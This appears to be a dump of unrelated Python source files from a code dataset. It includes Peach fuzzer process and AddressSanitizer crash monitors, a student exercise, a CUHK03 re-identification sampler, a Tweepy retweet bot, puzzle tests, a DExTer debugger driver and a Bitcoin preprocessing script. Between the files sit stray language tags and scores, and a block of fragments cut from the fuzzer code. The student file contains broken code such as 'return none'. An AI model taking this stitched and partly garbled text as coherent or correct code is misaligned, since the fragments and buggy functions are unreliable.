""" def __init__(self, args): self.restartOnTest = False if args.has_key('RestartOnEachTest'): if args['RestartOnEachTest'].replace("'''", "").lower() == 'true': self.restartOnTest = True self.faultOnEarlyExit = True if args.has_key('FaultOnEarlyExit'): if args['FaultOnEarlyExit'].replace("'''", "").lower() != 'true': self.faultOnEarlyExit = False self.startOnCall = False if args.has_key('StartOnCall'): self.startOnCall = True self.startOnCallMethod = args['StartOnCall'].replace("'''", "").lower() self.waitForExitOnCall = False if args.has_key('WaitForExitOnCall'): self.waitForExitOnCall = True self.waitForExitOnCallMethod = args['WaitForExitOnCall'].replace("'''", "").lower() if not args.has_key('Command'): raise PeachException("Error, monitor Process requires a parameter named 'Command'") self.strangeExit = False self.command = args["Command"].replace("'''", "") self.args = self.command.split() self.pid = None self.process = None def PublisherCall(self, method): method = method.lower() if self.startOnCall and self.startOnCallMethod == method: print("Process: startOnCall, starting process!") self._StopProcess() self._StartProcess() elif self.waitForExitOnCall and self.waitForExitOnCallMethod == method: print("Process: waitForExitOnCall, waiting on process exit") while True: if not self._IsProcessRunning(): print("Process: Process exitted") return time.sleep(0.25) def _StopProcess(self): print("Process._StopProcess") if not self.process: return if self._IsProcessRunning(): try: os.kill(self.process.pid, signal.SIGTERM) os.kill(self.process.pid, signal.SIGKILL) except: pass self.process.wait() self.process = None def _StartProcess(self): print("Process._StartProcess") if self.process: self._StopProcess() self.process = Popen(self.args) def _IsProcessRunning(self): if self.process is None: print("Process._IsProcessRunning: False (self.process == None)") return False if self.process.poll() is not None: print("Process._IsProcessRunning: False (self.process.poll != 
None)") return False print("Process._IsProcessRunning: True") return True def OnTestStarting(self): self.strangeExit = False if not self.startOnCall and (self.restartOnTest or not self._IsProcessRunning()): print("Process.OnTestStarting: Stopping and starting process") self._StopProcess() self._StartProcess() elif self.startOnCall: print("Process.OnTestStarting: Stopping process") self._StopProcess() print("Exiting OnTestStarting...") def OnTestFinished(self): if not self._IsProcessRunning(): self.strangeExit = True if self.restartOnTest: print("Process.OnTestFinished: Stopping process") self._StopProcess() elif self.startOnCall: print("Process.OnTestFinished: Stopping process") self._StopProcess() def GetMonitorData(self): if self.strangeExit: return {"Process.txt": "Process exited early"} return None def DetectedFault(self): if self.faultOnEarlyExit: return self.strangeExit else: return False def OnFault(self): self._StopProcess() def OnShutdown(self): self._StopProcess() class WindowsService(Monitor): """ Controls a windows service making sure it's started, optionally restarting, etc. 
""" def __init__(self, args): if args.has_key('RestartOnEachTest'): if args['RestartOnEachTest'].lower() == 'true': self.restartOnTest = True else: self.restartOnTest = False else: self.restartOnTest = False if args.has_key('FaultOnEarlyExit'): if args['FaultOnEarlyExit'].lower() == 'true': self.faultOnEarlyExit = True else: self.faultOnEarlyExit = False else: self.faultOnEarlyExit = True self.strangeExit = False self.service = args["Service"].replace("'''", "") if args.has_key("Machine"): self.machine = args["Machine"].replace("'''", "") else: self.machine = None def _StopProcess(self): win32serviceutil.StopService(self.service, self.machine) while win32serviceutil.QueryServiceStatus(self.service, self.machine)[1] == 3: time.sleep(0.25) if win32serviceutil.QueryServiceStatus(self.service, self.machine)[1] != 1: raise Exception("WindowsService: Unable to stop service!") def _StartProcess(self): if self._IsProcessRunning(): return win32serviceutil.StartService(self.service, self.machine) while win32serviceutil.QueryServiceStatus(self.service, self.machine)[1] == 2: time.sleep(0.25) if win32serviceutil.QueryServiceStatus(self.service, self.machine)[1] == 4: raise Exception("WindowsService: Unable to start service!") def _IsProcessRunning(self): if win32serviceutil.QueryServiceStatus(self.service, self.machine)[1] == 4: return True return False def OnTestStarting(self): self.strangeExit = False if self.restartOnTest or not self._IsProcessRunning(): self._StopProcess() self._StartProcess() def OnTestFinished(self): if not self._IsProcessRunning(): self.strangeExit = True if self.restartOnTest: self._StopProcess() def GetMonitorData(self): if self.strangeExit: return {"WindowsService.txt": "Process exited early"} return None def DetectedFault(self): #if self.faultOnEarlyExit: # return not self._IsProcessRunning() # #else: # return False return False def OnFault(self): self._StopProcess() def OnShutdown(self): pass class ProcessKiller(Monitor): """Will watch for specific 
process and kill.""" def __init__(self, args): self._name = "ProcessWatcher" if not args.has_key("ProcessNames"): raise Exception("ProcessWatcher requires a parameter named ProcessNames.") self._names = args["ProcessNames"].replace("'''", "").split(',') def OnTestStarting(self): pass def OnTestFinished(self): for name in self._names: os.popen('TASKKILL /IM ' + name + ' /F') time.sleep(.6) def DetectedFault(self): return False def OnShutdown(self): try: for name in self._names: os.popen('TASKKILL /IM ' + name + ' /F') time.sleep(.6) except: pass class ProcessID(Monitor): """ Monitors CrashReporter on MacOS, LinuxApport on Linux and the process id of a process. There are external monitors present for CrashReporter and LinuxApport but applying them means having a delay between each testcase because they will wait and observe a folder for a crash report after each test case. This monitor tries to observe the process id for a change and will only after observe a specific folder for a crash report. The monitor does not work with child processes like plugin processes. 
""" def __init__(self, args): Monitor.__init__(self, args) self._name = "ProcessID" self.command = getStringAttribute(args, "Command") if not self.command: raise ValueError("Command not provided or empty in %s" % __file__) self.arguments = shlex.split(self.command) + shlex.split(getStringAttribute(args, "Arguments")) self.process_environment = getStringAttribute(args, "Environment") if self.process_environment: os.environ.update(dict([p.split("=") for p in self.process_environment.split("|")])) self.asan_options = getStringAttribute(args, "ASanOptions") if self.asan_options: os.environ["ASAN_OPTIONS"] = "%s" % self.asan_options self.asan_library_path = getStringAttribute(args, "ASanMacOSRuntime") if isMacOS and self.asan_library_path: os.environ["DYLD_LIBRARY_PATH"] = getStringAttribute(args, "ASanMacOSRuntime") self.asan_symbolizer = getStringAttribute(args, "ASanSymbolizer") if self.asan_symbolizer: os.environ["ASAN_SYMBOLIZER_PATH"] = self.asan_symbolizer self.heartbeat = getFloatAttribute(args, "Heartbeat", "0.0") self.monitor_console = getBooleanAttribute(args, "NoConsoleLogging") self.gdb_cmd_batch = getStringAttribute(args, "GDBCommands") self.print_subprocess_output = getBooleanAttribute(args, "PrintSubprocessOutput") self.lookout_time = getFloatAttribute(args, "LookoutTime", "5.0") self.system_report_path = getStringAttribute(args, 'LogFolder') if self.system_report_path and not os.path.isdir(self.system_report_path): raise ValueError("Provided path for LogFolder is invalid.") elif isMacOS(): self.system_report_path = os.path.join(os.environ['HOME'], "Library/Logs/DiagnosticReports") if os.path.isdir(self.system_report_path): try: os.makedirs(self.system_report_path) except (IOError, OSError) as e: if e.errno != 17: raise self.pid = self.process = None self.console_log = self.crash_trace = [] self.failure = False self.first_run = True def OnTestStarting(self): if not self._IsRunning(): self._StartProcess() def _StartProcess(self): print("Command: 
{}".format(self.arguments)) self.process = Popen(self.arguments, stderr=STDOUT, stdout=PIPE, env=os.environ, bufsize=1, close_fds=isPosix()) self.pid = self.process.pid def enqueue_output(out, queue): for line in iter(out.readline, ""): queue.put(line) out.close() self.terminal_queue = Queue.Queue() self.terminal_producer = threading.Thread(target=enqueue_output, args=(self.process.stdout, self.terminal_queue)) self.terminal_consumer = threading.Thread(target=self._grab_sanitizer_trace) self.terminal_producer.setDaemon(True) self.terminal_consumer.setDaemon(True) self.terminal_producer.start() self.terminal_consumer.start() def _IsRunning(self): if self.process is None: MonitorDebug(self._name, "IsRunning: False (self.process == None") return False if self.process.poll() is not None: MonitorDebug(self._name, "IsRunning: False (self.process.poll != None)") return False MonitorDebug(self._name, "IsRunning: True") return True def _grab_sanitizer_trace(self): """Run in the background and set self.failure to true once an ASan crash got detected.""" inside_sanitizer_trace = False self.crash_trace = [] while True: captured_line = self.terminal_queue.get() if self.print_subprocess_output: print(captured_line.strip("\n")) if self.monitor_console: self.console_log.append(captured_line) if not inside_sanitizer_trace: if captured_line.find("ERROR: AddressSanitizer") != -1 and captured_line.find("AddressSanitizer failed to allocate") == -1: inside_sanitizer_trace = True if inside_sanitizer_trace and \ (captured_line.find("Stats: ") != -1 or captured_line.find("ABORTING") != -1 or captured_line.find("ERROR: Failed") != -1): inside_sanitizer_trace = False self.failure = True break if inside_sanitizer_trace: self.crash_trace.append(captured_line) if self.failure and self._IsRunning(): self.process.terminate() self.process.kill() self.process = None def OnTestFinished(self): self.console_log = [] if not self._IsRunning(): self.failure = True time.sleep(self.heartbeat) def 
_from_core_dump(self, log_folder): core_filename = os.path.join(log_folder, 'core.%s' % str(self.pid)) if os.path.exists(core_filename): gdb_args = ["gdb", "-n", "-batch", "-x", self.gdb_cmd_batch, self.command, core_filename] gdb_output = check_output(gdb_args, stdin=None, stderr=STDOUT, close_fds=isPosix()) os.remove(core_filename) return gdb_output def _from_crash_reporter(self, log_folder): report = "" for fname in os.listdir(log_folder): if not fname.endswith(".crash"): continue with open(os.path.join(log_folder, fname)) as fd: content = fd.readlines() try: crash_pid = int(re.findall("\[(\d+)\]", content[0])[0]) except: continue if crash_pid == self.pid: report = "".join(content) os.remove(os.path.join(log_folder, fname)) break return report def get_crash_report(self, log_folder): if not os.path.isdir(log_folder): return "" if isMacOS(): return self._from_crash_reporter(log_folder) if isLinux(): return self._from_core_dump(log_folder) def DetectedFault(self): return self.failure def GetMonitorData(self): time.sleep(self.lookout_time) sytem_crash_report = self.get_crash_report(self.system_report_path) bucket = {} if not len(self.crash_trace): if self.process.returncode < 0: crashSignals = [ # POSIX.1-1990 signals signal.SIGILL, signal.SIGABRT, signal.SIGFPE, signal.SIGSEGV, # SUSv2 / POSIX.1-2001 signals signal.SIGBUS, signal.SIGSYS, signal.SIGTRAP, ] for crashSignal in crashSignals: if process.returncode == -crashSignal: bucket["auxdat.txt"] = "Process exited with signal: %d" % -process.returncode else: bucket["auxdat.txt"] = "".join(self.crash_trace) if sytem_crash_report: bucket["system_crash_report.txt"] = sytem_crash_report if self.console_log: bucket["stdout.txt"] = "".join(self.console_log[-1000:]) if self.failure: meta = { "environ": os.environ.data, "command": self.arguments } bucket["meta.txt"] = json.dumps(dict(meta)) bucket["Bucket"] = os.path.basename(self.command) return bucket def OnFault(self): self._StopProcess() def OnShutdown(self): 
self._StopProcess() def _StopProcess(self): self.failure = False if self._IsRunning(): try: MonitorDebug(self._name, "calling terminate()") self.process.terminate() MonitorDebug(self._name, "calling kill()") self.process.kill() except Exception: print(sys.exc_info()) self.process.wait() self.process = None class ASanConsoleMonitor(Monitor): def __init__(self, args): Monitor.__init__(self, args) self._name = "ASanConsoleMonitor" self.command = getStringAttribute(args, "Command") if not self.command: raise ValueError("Command not provided or empty in %s" % __file__) self.arguments = shlex.split(self.command) + shlex.split(getStringAttribute(args, "Arguments")) self.process_environment = getStringAttribute(args, "Environment") if self.process_environment: os.environ.update(dict([p.split("=") for p in self.process_environment.split("|")])) self.asan_options = getStringAttribute(args, "ASanOptions") if self.asan_options: os.environ["ASAN_OPTIONS"] = "%s" % self.asan_options self.asan_library_path = getStringAttribute(args, "ASanMacOSRuntime") if isMacOS and self.asan_library_path: os.environ["DYLD_LIBRARY_PATH"] = getStringAttribute(args, "ASanMacOSRuntime") self.asan_symbolizer = getStringAttribute(args, "ASanSymbolizer") if self.asan_symbolizer: os.environ["ASAN_SYMBOLIZER_PATH"] = self.asan_symbolizer if "StartOnCall" in args: self.start_on_call = True self.OnCallMethod = getStringAttribute(args, 'StartOnCall') else: self.start_on_call = False self.asan_regex = "(ERROR: AddressSanitizer:.*[Stats:|ABORTING|ERROR: Failed])" self.stderr = [] self.stdout = [] self.sanlog = [] self.process = None self.failure = False def OnTestStarting(self): if not self.start_on_call and not self._IsRunning(): self._StopProcess() self._StartProcess() elif self.start_on_call: self._StopProcess() def PublisherCall(self, method): if self.start_on_call and self.OnCallMethod == method: MonitorDebug(self._name, "PublisherCall") self._StopProcess() self._StartProcess() def _IsRunning(self): if 
self.process is None: MonitorDebug(self._name, "IsRunning: False (self.process == None") return False if self.process.poll() is not None: MonitorDebug(self._name, "IsRunning: False (self.process.poll != None)") return False MonitorDebug(self._name, "IsRunning: True") return True def _StartProcess(self): MonitorDebug(self._name, "_StartProcess") self.failure = False self.sanlog = [] self.stderr = [] self.stdout = [] print("Command: {}".format(self.arguments)) self.process = Popen(self.arguments, stderr=PIPE, stdout=PIPE, env=os.environ, bufsize=1, close_fds=isPosix()) # Todo: Add timeout= for GUI applications. stdout, stderr = self.process.communicate() if stderr.find("ERROR: AddressSanitizer: ") != -1: if stderr.find("AddressSanitizer failed to allocate") == -1: self.failure = True self.sanlog = re.findall(self.asan_regex, stderr, re.DOTALL)[0] self.stdout = stdout self.stderr = stderr else: if self.process.returncode < 0: crashSignals = [ # POSIX.1-1990 signals signal.SIGILL, signal.SIGABRT, signal.SIGFPE, signal.SIGSEGV, # SUSv2 / POSIX.1-2001 signals signal.SIGBUS, signal.SIGSYS, signal.SIGTRAP, ] for crashSignal in crashSignals: if process.returncode == -crashSignal: self.failure = True self.sanlog = "Process exited with signal: %d" % -process.returncode self.stdout = stdout self.stderr = stderr if self.failure: self._StopProcess() def OnTestFinished(self): if self._IsRunning(): self._StopProcess() def DetectedFault(self): return self.failure def GetMonitorData(self): #if not self.failure: # return bucket = {} if self.sanlog: bucket["auxdat.txt"] = "".join(self.sanlog) if self.stdout: bucket["stdout.txt"] = "".join(self.stdout) if self.stderr: bucket["stderr.txt"] = "".join(self.stderr) meta = { "environ": os.environ.data, "command": self.arguments, "returncode": self.process.returncode } bucket["meta.txt"] = json.dumps(dict(meta)) bucket["Bucket"] = os.path.basename(self.command) return bucket def OnFault(self): self._StopProcess() def OnShutdown(self): 
self._StopProcess() def _StopProcess(self): if not self.process: return if self._IsRunning(): try: MonitorDebug(self._name, "calling terminate()") self.process.terminate() MonitorDebug(self._name, "calling kill()") self.process.kill() except Exception: print(sys.exc_info()) self.process.wait() self.process = None
en
0.573869
# This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this # file, You can obtain one at http://mozilla.org/MPL/2.0/. # Todo: Test monitors on Windows and check Python 3 compatibility with PyWin32 # Todo: Find out which methods are used from this import and do it the right way. A monitor that will enable/disable pageheap on an executable. ", ""), "gflags.exe") except: self._path = os.path.join(self.LocateWinDbg(), 'gflags.exe') self._exe = os.path.basename(args['Executable'].replace(" # NOTE: Update master copy in debugger.py if you change this. # Lets try a few common places before failing. Process control agent. This agent is able to start, stop, and monitor if a process is running. If the process exits early a fault will be issued to the fuzzer. ", "").lower() == 'true': self.restartOnTest = True self.faultOnEarlyExit = True if args.has_key('FaultOnEarlyExit'): if args['FaultOnEarlyExit'].replace(" ", "").lower() self.waitForExitOnCall = False if args.has_key('WaitForExitOnCall'): self.waitForExitOnCall = True self.waitForExitOnCallMethod = args['WaitForExitOnCall'].replace(" ", "") self.args = None self.pid = None self.hProcess = None self.hThread = None self.dwProcessId = None self.dwThreadId = None def PublisherCall(self, method): method = method.lower() if self.startOnCall and self.startOnCallMethod == method: print("Process: startOnCall, starting process!") self._StopProcess() self._StartProcess() elif self.waitForExitOnCall and self.waitForExitOnCallMethod == method: print("Process: waitForExitOnCall, waiting on process exit") while True: if not self._IsProcessRunning: print("Process: Process exitted") return time.sleep(0.25) def _StopProcess(self): if self.hProcess is None: return if self._IsProcessRunning(): TerminateProcess(self.hProcess, 0) self.hProcess = None self.hThread = None self.dwProcessId = None self.dwThreadId = None def _StartProcess(self): if self.hProcess is 
not None: self._StopProcess() hProcess, hThread, dwProcessId, dwThreadId = CreateProcess(None, self.command, None, None, 0, 0, None, None, STARTUPINFO()) self.hProcess = hProcess self.hThread = hThread self.dwProcessId = dwProcessId self.dwThreadId = dwThreadId def _IsProcessRunning(self): if self.hProcess is None: return False ret = GetExitCodeProcess(self.hProcess) if ret != win32con.STILL_ACTIVE: return False ret = GetExitCodeThread(self.hThread) if ret != win32con.STILL_ACTIVE: return False return True def OnTestStarting(self): self.strangeExit = False if not self.startOnCall and (self.restartOnTest or not self._IsProcessRunning()): self._StopProcess() self._StartProcess() elif self.startOnCall: self._StopProcess() def OnTestFinished(self): if not self._IsProcessRunning(): self.strangeExit = True if self.restartOnTest: self._StopProcess() elif self.startOnCall: self._StopProcess() def GetMonitorData(self): if self.strangeExit: return {"WindowsProcess.txt": "Process exited early"} return None def DetectedFault(self): if self.faultOnEarlyExit: return not self._IsProcessRunning() else: return False def OnFault(self): self._StopProcess() def OnShutdown(self): self._StopProcess() class Process(Monitor): """ Process control agent. This agent is able to start, stop, and monitor if a process is running. If the process exits early a fault will be issued to the fuzzer. """ def __init__(self, args): self.restartOnTest = False if args.has_key('RestartOnEachTest'): if args['RestartOnEachTest'].replace(" ", "").lower() != 'true': self.faultOnEarlyExit = False self.startOnCall = False if args.has_key('StartOnCall'): self.startOnCall = True self.startOnCallMethod = args['StartOnCall'].replace(" ", "").lower() if not args.has_key('Command'): raise PeachException("Error, monitor Process requires a parameter named 'Command'") self.strangeExit = False self.command = args["Command"].replace(" Controls a windows service making sure it's started, optionally restarting, etc. 
", "") if args.has_key("Machine"): self.machine = args["Machine"].replace(" #if self.faultOnEarlyExit: # return not self._IsProcessRunning() # #else: # return False Will watch for specific process and kill. Monitors CrashReporter on MacOS, LinuxApport on Linux and the process id of a process. There are external monitors present for CrashReporter and LinuxApport but applying them means having a delay between each testcase because they will wait and observe a folder for a crash report after each test case. This monitor tries to observe the process id for a change and will only after observe a specific folder for a crash report. The monitor does not work with child processes like plugin processes. Run in the background and set self.failure to true once an ASan crash got detected. # POSIX.1-1990 signals # SUSv2 / POSIX.1-2001 signals # Todo: Add timeout= for GUI applications. # POSIX.1-1990 signals # SUSv2 / POSIX.1-2001 signals #if not self.failure: # return
1.914312
2
examples/1827405035.py
lobo0616/bysj
1
6618556
<filename>examples/1827405035.py # 学号:1827405035 # 姓名:朱弘毅 # IP:192.168.157.179 # 上传时间:2018/11/12 14:35:14 import math def func1(a,b): if a>0 and b>0 and a<b: ans=1 for i in range(a,b+1): ans*=i count=0 while ans%10==0: count+=1 ans/=10 return count if a>=b or a<0 or b<0: return none def func2(a,b): if a<0 or b<0: return none else: count=0 for i in range(a,b+1): res=0 temp=i while temp>0: res=res*10+temp%10 temp=temp//10 if res==i: count+=1 return count def func3(lst): res=[] for i in range(len(lst)): if lst[i]>0 and lst[i]%3!=0: res.append(lst[i]) res.sort(reverse=True) return res if __name__=="__main__": print(func3([1,3,2,-1]))
<filename>examples/1827405035.py # 学号:1827405035 # 姓名:朱弘毅 # IP:192.168.157.179 # 上传时间:2018/11/12 14:35:14 import math def func1(a,b): if a>0 and b>0 and a<b: ans=1 for i in range(a,b+1): ans*=i count=0 while ans%10==0: count+=1 ans/=10 return count if a>=b or a<0 or b<0: return none def func2(a,b): if a<0 or b<0: return none else: count=0 for i in range(a,b+1): res=0 temp=i while temp>0: res=res*10+temp%10 temp=temp//10 if res==i: count+=1 return count def func3(lst): res=[] for i in range(len(lst)): if lst[i]>0 and lst[i]%3!=0: res.append(lst[i]) res.sort(reverse=True) return res if __name__=="__main__": print(func3([1,3,2,-1]))
ja
0.382425
# 学号:1827405035 # 姓名:朱弘毅 # IP:192.168.157.179 # 上传时间:2018/11/12 14:35:14
3.697723
4
Neural/CUHK03_Sampler.py
mkhozin/cabbage
78
6618557
<gh_stars>10-100 import numpy as np from os import makedirs, listdir from os.path import join, isfile, isdir, exists, splitext from pak import utils import json from pprint import pprint from pak.datasets.CUHK03 import cuhk03 class CUHK03_Sampler: def __init__(self, target_w=112, target_h=112, T=100, settings_url='../prototyping/settings.txt'): """ctor """ Settings = json.load(open(settings_url)) pprint(Settings) root = Settings['data_root'] self.root = root cuhk = cuhk03(root, target_w=target_w, target_h=target_h) X, Y = cuhk.get_labeled() self.X = X self.Y = Y index_test, index_train = [], [] for i, y in enumerate(Y): if y <= T: index_test.append(i) else: index_train.append(i) self.index_test = np.array(index_test) self.index_train = np.array(index_train) # test pairs fpairs_test = self.get_pos_pairs_file_name('test') if isfile(fpairs_test): self.test_pos_pair = np.load(fpairs_test) else: self.test_pos_pair = [] for i in index_test: for j in index_test: if Y[i] == Y[j]: self.test_pos_pair.append((i, j)) self.test_pos_pair = np.array(self.test_pos_pair) np.save(fpairs_test, self.test_pos_pair) print("positive test pairs:", len(self.test_pos_pair)) # train pairs fpairs_train = self.get_pos_pairs_file_name('train') if isfile(fpairs_train): self.train_pos_pair = np.load(fpairs_train) else: self.train_pos_pair = [] for i in index_train: for j in index_train: if Y[i] == Y[j]: self.train_pos_pair.append((i, j)) self.train_pos_pair = np.array(self.train_pos_pair) np.save(fpairs_train, self.train_pos_pair) print("positive train pairs:", len(self.train_pos_pair)) def get_pos_pairs_file_name(self, folder): root = self.root file_name = 'cuhk03_sampler_' + folder + '.npy' return join(root, file_name) def get_test_batch(self, num_pos, num_neg): return self.get_batch(num_pos, num_neg, self.test_pos_pair, self.index_test) def get_train_batch(self, num_pos, num_neg): return self.get_batch(num_pos, num_neg, self.train_pos_pair, self.index_train) def get_batch(self, num_pos, 
num_neg, pos_pairs, valid_indexes): """ generic batch function """ pos_indx = np.random.choice(len(pos_pairs), size=num_pos, replace=False) sampled_pos_pairs = pos_pairs[pos_indx] sampled_neg_pairs = [] Y = self.Y X = self.X n_all_indexes = len(valid_indexes) while len(sampled_neg_pairs) < num_neg: a, b = np.random.choice( n_all_indexes, size=2, replace=False) if Y[a] != Y[b]: sampled_neg_pairs.append((a,b)) sampled_neg_pairs = np.array(sampled_neg_pairs) Ap = sampled_pos_pairs[:,0] Bp = sampled_pos_pairs[:,1] An = sampled_neg_pairs[:,0] Bn = sampled_neg_pairs[:,1] X_a_pos = X[Ap] X_b_pos = X[Bp] X_a_neg = X[An] X_b_neg = X[Bn] X_a = np.concatenate([X_a_pos, X_a_neg]) X_b = np.concatenate([X_b_pos, X_b_neg]) X = np.concatenate((X_a, X_b), axis=3) Y = np.array([(1, 0)] * num_pos + [(0, 1)] * num_neg) n = num_pos + num_neg order = np.random.choice(n, size=n, replace=False) return X[order], Y[order] # ~~~~~~~~~~~~~~~~~~~~~~~~~
import numpy as np from os import makedirs, listdir from os.path import join, isfile, isdir, exists, splitext from pak import utils import json from pprint import pprint from pak.datasets.CUHK03 import cuhk03 class CUHK03_Sampler: def __init__(self, target_w=112, target_h=112, T=100, settings_url='../prototyping/settings.txt'): """ctor """ Settings = json.load(open(settings_url)) pprint(Settings) root = Settings['data_root'] self.root = root cuhk = cuhk03(root, target_w=target_w, target_h=target_h) X, Y = cuhk.get_labeled() self.X = X self.Y = Y index_test, index_train = [], [] for i, y in enumerate(Y): if y <= T: index_test.append(i) else: index_train.append(i) self.index_test = np.array(index_test) self.index_train = np.array(index_train) # test pairs fpairs_test = self.get_pos_pairs_file_name('test') if isfile(fpairs_test): self.test_pos_pair = np.load(fpairs_test) else: self.test_pos_pair = [] for i in index_test: for j in index_test: if Y[i] == Y[j]: self.test_pos_pair.append((i, j)) self.test_pos_pair = np.array(self.test_pos_pair) np.save(fpairs_test, self.test_pos_pair) print("positive test pairs:", len(self.test_pos_pair)) # train pairs fpairs_train = self.get_pos_pairs_file_name('train') if isfile(fpairs_train): self.train_pos_pair = np.load(fpairs_train) else: self.train_pos_pair = [] for i in index_train: for j in index_train: if Y[i] == Y[j]: self.train_pos_pair.append((i, j)) self.train_pos_pair = np.array(self.train_pos_pair) np.save(fpairs_train, self.train_pos_pair) print("positive train pairs:", len(self.train_pos_pair)) def get_pos_pairs_file_name(self, folder): root = self.root file_name = 'cuhk03_sampler_' + folder + '.npy' return join(root, file_name) def get_test_batch(self, num_pos, num_neg): return self.get_batch(num_pos, num_neg, self.test_pos_pair, self.index_test) def get_train_batch(self, num_pos, num_neg): return self.get_batch(num_pos, num_neg, self.train_pos_pair, self.index_train) def get_batch(self, num_pos, num_neg, pos_pairs, 
valid_indexes): """ generic batch function """ pos_indx = np.random.choice(len(pos_pairs), size=num_pos, replace=False) sampled_pos_pairs = pos_pairs[pos_indx] sampled_neg_pairs = [] Y = self.Y X = self.X n_all_indexes = len(valid_indexes) while len(sampled_neg_pairs) < num_neg: a, b = np.random.choice( n_all_indexes, size=2, replace=False) if Y[a] != Y[b]: sampled_neg_pairs.append((a,b)) sampled_neg_pairs = np.array(sampled_neg_pairs) Ap = sampled_pos_pairs[:,0] Bp = sampled_pos_pairs[:,1] An = sampled_neg_pairs[:,0] Bn = sampled_neg_pairs[:,1] X_a_pos = X[Ap] X_b_pos = X[Bp] X_a_neg = X[An] X_b_neg = X[Bn] X_a = np.concatenate([X_a_pos, X_a_neg]) X_b = np.concatenate([X_b_pos, X_b_neg]) X = np.concatenate((X_a, X_b), axis=3) Y = np.array([(1, 0)] * num_pos + [(0, 1)] * num_neg) n = num_pos + num_neg order = np.random.choice(n, size=n, replace=False) return X[order], Y[order] # ~~~~~~~~~~~~~~~~~~~~~~~~~
pl
0.095157
ctor # test pairs # train pairs generic batch function # ~~~~~~~~~~~~~~~~~~~~~~~~~
2.17852
2
python/twitter/bots/favretweet.py
imjoseangel/100DaysOfCode
1
6618558
#!/usr/bin/env python # -*- coding: utf-8 -*- # pylint: disable=arguments-differ,super-init-not-called from __future__ import (division, absolute_import, print_function, unicode_literals) import logging import tweepy from config import create_api logging.basicConfig(level=logging.INFO) logger = logging.getLogger() class FavRetweetListener(tweepy.StreamListener): def __init__(self, api): self.api = api self.me = api.me() def on_status(self, tweet): logger.info("Processing tweet id %s", tweet.id) if tweet.in_reply_to_status_id is not None or \ tweet.user.id == self.me.id: return try: tweet.favorite() tweet.retweet() except tweepy.TweepError: logger.error("Error on fav and retweet", exc_info=True) def on_error(self, status): logger.error(status) def main(keywords): api = create_api() tweets_listener = FavRetweetListener(api) stream = tweepy.Stream(api.auth, tweets_listener) stream.filter(track=keywords, languages=["en"]) if __name__ == '__main__': main(["Python", "Tweepy"])
#!/usr/bin/env python # -*- coding: utf-8 -*- # pylint: disable=arguments-differ,super-init-not-called from __future__ import (division, absolute_import, print_function, unicode_literals) import logging import tweepy from config import create_api logging.basicConfig(level=logging.INFO) logger = logging.getLogger() class FavRetweetListener(tweepy.StreamListener): def __init__(self, api): self.api = api self.me = api.me() def on_status(self, tweet): logger.info("Processing tweet id %s", tweet.id) if tweet.in_reply_to_status_id is not None or \ tweet.user.id == self.me.id: return try: tweet.favorite() tweet.retweet() except tweepy.TweepError: logger.error("Error on fav and retweet", exc_info=True) def on_error(self, status): logger.error(status) def main(keywords): api = create_api() tweets_listener = FavRetweetListener(api) stream = tweepy.Stream(api.auth, tweets_listener) stream.filter(track=keywords, languages=["en"]) if __name__ == '__main__': main(["Python", "Tweepy"])
en
0.516048
#!/usr/bin/env python # -*- coding: utf-8 -*- # pylint: disable=arguments-differ,super-init-not-called
2.419613
2
day6/test_day6.py
chrisb87/advent_of_code_2016
1
6618559
import unittest

from day6 import *


class TestDay6Part1(unittest.TestCase):
    """Regression tests for the day 6 puzzle solver (both parts)."""

    def test_part_1_test_input(self):
        """Part 1 against the worked example decodes to 'easter'."""
        result = solve(test=True, part=1)
        self.assertEqual('easter', result)

    def test_part_1(self):
        """Part 1 against the real puzzle input."""
        result = solve(test=False, part=1)
        self.assertEqual('qoclwvah', result)

    def test_part_2_test_input(self):
        """Part 2 against the worked example decodes to 'advent'."""
        result = solve(test=True, part=2)
        self.assertEqual('advent', result)

    def test_part_2(self):
        """Part 2 against the real puzzle input."""
        result = solve(test=False, part=2)
        self.assertEqual('ryrgviuv', result)
none
1
3.058444
3
cross-project-tests/debuginfo-tests/dexter/dex/debugger/visualstudio/VisualStudio2019.py
mkinsner/llvm
2,338
6618560
# DExTer : Debugging Experience Tester
# ~~~~~~   ~         ~~         ~   ~~
#
# Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
"""Specializations for the Visual Studio 2019 interface."""

from dex.debugger.visualstudio.VisualStudio import VisualStudio


class VisualStudio2019(VisualStudio):
    """Debugger driver specialized for the Visual Studio 2019 IDE."""

    @classmethod
    def get_name(cls):
        """Human-readable debugger name."""
        return 'Visual Studio 2019'

    @classmethod
    def get_option_name(cls):
        """Value accepted by the --debugger command-line option."""
        return 'vs2019'

    @property
    def _dte_version(self):
        """COM ProgID of the VS2019 DTE automation interface."""
        return 'VisualStudio.DTE.16.0'
en
0.600103
# DExTer : Debugging Experience Tester # ~~~~~~ ~ ~~ ~ ~~ # # Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. # See https://llvm.org/LICENSE.txt for license information. # SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception Specializations for the Visual Studio 2019 interface.
1.098304
1
src/preprocess.py
mugeshk97/bitcoin-price-forecasting
0
6618561
import pandas as pd
import numpy as np
import pytz
from datetime import datetime

from utils import load_config

config = load_config()

tz = pytz.timezone('Asia/Kolkata')

# Minute-level OHLC data; the 'unix' column is in milliseconds -> seconds.
data = pd.read_csv('data/raw/Binance_BTCUSDT_minute.csv', parse_dates=['date'])
data = data.sort_values(by='date').reset_index(drop=True)
data.unix = data.unix / 1000


def new_feature(data):
    """Add previous-close and close-change columns in place.

    The first row has no previous close, so its change is filled with 0.
    Returns the mutated frame for convenience.
    """
    data['previous-close'] = data.shift(1)['close']
    data['close-change'] = data['close'] - data['previous-close']
    data['close-change'] = data['close-change'].fillna(0)
    return data


def process(data):
    """Build the feature frame: calendar fields, OHLC and close change.

    Timestamps are localized to Asia/Kolkata before extracting calendar
    features, then serialized back to 'YYYY-MM-DD HH:MM:SS' strings.
    """
    df = pd.DataFrame()
    df['date'] = [datetime.fromtimestamp(i, tz) for i in data['unix']]
    df['day_of_month'] = [i.day for i in df['date']]
    df['day_of_week'] = [i.dayofweek for i in df['date']]
    # Timestamp.week was deprecated and removed in pandas 2.0;
    # isocalendar()[1] is the same ISO week number.
    df['week_of_year'] = [i.isocalendar()[1] for i in df['date']]
    df['month'] = [i.month for i in df['date']]
    df['open'] = list(data['open'])
    df['high'] = list(data['high'])
